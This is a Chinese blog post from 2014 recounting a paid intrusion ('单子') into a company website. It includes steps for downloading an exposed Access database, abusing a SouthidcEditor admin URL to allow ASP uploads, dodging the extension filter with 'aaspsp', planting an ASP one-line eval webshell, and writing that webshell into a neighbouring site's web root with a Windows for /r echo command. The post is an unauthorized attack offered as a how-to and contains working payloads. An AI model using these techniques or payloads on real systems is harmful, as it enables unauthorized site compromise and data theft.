注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

【单子】记一拿单子过程  

2014-05-31 19:34:34|  分类: 渗透入侵实例 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

昨晚没事又在群里跟那些2货扯谈了!因为上次应包大人 帮他拿下他地方论坛的站!所以逗他陪我玩了两天! 给回他shell后他说给我介绍个人`放单子的!

      看下站点www.XXX.com 因为是单子站`所以掩盖一下!也不是什么大站`只是一个企业站!

      大概结合google看了下 全站都没带参数的地方`那就是说没有地方可以注入!那我们先看看后台吧` www.XXX.com/admin/login.asp `存在` 随便输入一些弱口令 和万能密码`无果~! 那就看看数据库和编辑器吧! www.XXX.com/data/  存在 www.XXX.com/data/data.mdb  弹出来了! 那数据库浏览器 看了下` 不存在加密! 进入后台`发现就那么简单的页面

【单子】记一拿单子过程 - IversOn5 - IversOn5 blog
 

看到没法利用了``编辑器也没找到`大概就是删了吧!那我们就来看下旁站

【单子】记一拿单子过程 - IversOn5 - IversOn5 blog
 

看吧`大概有26个这么多!那现在好搞了!!! 过去了半小时```全部都不是找不到后台没地方可以利用就是挂了的网站!

因为我喜欢从最后开始搞起`所以剩下最后1个站的时候`心里非常蛋疼`

大概看了下最后一个站`是伪静态的网站`找了下后台` XXX2.com/admin/admin_login.asp  !当时又鸡冻又蛋疼` 前台是伪静态` 但是后台还保存了账号`先试试密码 admin,当时我震惊了! 好吧`上传照片备份!失败了```捉包明小子上传`nc改包上传都失败了`郁闷啊!!!添加一个上传格式 cer|asa|asp|php|aspx   找地方上传发现上传cer是不支持的,那看下asa,asp就不能上传`通常添加php是可以上传的!上传成功后发现打开是空白`无论是一句话还是免杀大小马老马都不行! 那试试aspx吧`不支持! 还有编辑器漏洞`发现是超级老的版本`还不知道是那种编辑器`没利用地方`试试解释漏洞不行``利用后台配置插闭合一句话!发现插完后发现直接500了!我晕`反正就不能插```然后翻了一回`居然还有一种编辑器`好激动`  是SouthidcEditor编辑器!

先查看源码 找地址 admin//Southidceditor/

403`OK了`在后面加上admin_style.asp?action=copy&id=14

成功跳到样式添加的页面! 

"""0因为这是昨晚的东西`所以这个站挂了`截不到图!0""

增加 asa,asp   然后到编辑器里上传`发现上传的asa文件都不成功`404`为啥呢!免杀等一些都一样`然后新建一个空的asa文件上传`原来他是过滤了asa后缀` 那我们就来上传asp吧`  不允许上传! 过滤了asp 字符 `重新到样式添加那里  添加aaspsp ! 再重新上传一次!成功! 打开看看发现404``因为是免杀的小马`所以又试试 一句话```果断成功 `菜刀连接之!  然后上大马!发现又显示404`我晕  这个过滤太牛X了!上传个比较牛的免杀大马``现在这次是成功了!

在webshell里看组件`ws  √   这下行了```只支持asp和php `看下磁盘权限!找个可读可写的文件夹```当然又可能没运行权限!  先试试跨目录吧`不行!  上传cmd到 D:temp  成功!运行cmd   成功回显!    添加用户不行` 以为策略问题添加一个 复杂密码的账号同样!

一律提权杀器` 什么的都同样无果```可用第三方软件没找到! 

想了下`反正都是拿网站权限`不要服务器了!  

执行for 命令! 当然前提是要清楚 目标站路径!   到目标站看下爆路径方法!看下路径规律!  iis 你懂的!For命令!

所以得知路径是 d:\wwwroot\xxx2.com\wwwroot !目标站路径 d:\wwwroot\xxx.com\wwwroot或者d:\wwwroot\www.xxx.com\wwwroot

好了现在知道了路径!  执行  for /r d:\ %i in (123) do @echo %i >>D:\temp\111.txt

成功``那些进去目标站 for /r d:\ %i in (123) do @echo %i >> d:\wwwroot\xxx.com\wwwroot\hack.asp

去目标站加上hack.asp 看看`没成功 

再试试  for /r d:\ %i in (123) do @echo %i >> d:\wwwroot\www.xxx.com\wwwroot\hack.asp

可以写进去! 那写个一句话吧!  for /r d:\ %i in ( <%eval request("danzi")%>) do @echo %i >> d:\wwwroot\www.xxx.com\wwwroot\1.asp

发现丢失字符   那加哥双引号看啊看! 

for /r d:\ %i in ("<%eval request("danzi")%>") do @echo %i >> d:\wwwroot\www.xxx.com\wwwroot\111.asp

 

好的`空白`菜刀连接之!

【转】 记一拿单子过程 - Faust - Faust的博客

 

总结: 通常黑站虽然都是那么几步`但是 细节决定成败! 不知道哪位同学说的!  提权也未必用神器``也可以通过第三方! 或者找mysql 目录 su目录等等```方法有很多种`大家可以细心找找! 命令也很重要`同学们去温习温习吧 `什么for啊`什么copy啊`什么type啊等等` 本文无亮点无技术``希望大牛别喷```

  评论这张
 
阅读(400)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017